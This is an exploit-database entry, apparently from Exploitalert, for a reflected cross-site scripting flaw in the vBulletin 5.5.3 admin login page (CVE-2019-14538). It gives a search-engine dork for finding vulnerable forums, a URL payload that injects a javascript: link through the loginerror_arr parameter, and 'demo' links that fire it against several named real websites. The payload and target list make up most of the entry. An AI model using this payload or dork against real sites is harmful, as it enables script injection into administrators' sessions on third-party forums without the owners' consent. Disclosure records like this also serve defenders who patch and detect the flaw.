# Exploit Title: vBulletin Reflected XSS via "Click here" 
# Google Dork: intext : "Powered by vBulletin Version 5.5.3 Copyright  2019 MH Sub I, LLC dba vBulletin"
# Date: 05/08/2019
# Exploit Author: TrazeR / AKNCLAR
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: https://www.vbulletin.com/download.php
# Version: vBulletin 5.5.3
# Tested on: Windows 10
# CVE : CVE-2019-14538


#################################################################################

Dork: intext : "Powered by vBulletin Version 5.5.3 Copyright  2019 MH Sub I, LLC dba vBulletin"

vBulletin 5.5.3 Reflected XSS via "Click here" 

Payload: 

/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

(Click here!) click here xss will work

Demo : 

https://forum.vbulletin.com/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://www.scootersoftware.com/vbulletin//admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://www.photorials.nl/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

https://powerhacker.net/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin

screenshot: https://imguploads.net/images/2019/08/25/vbulletin-xss-trazer.png

#################################################################################

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.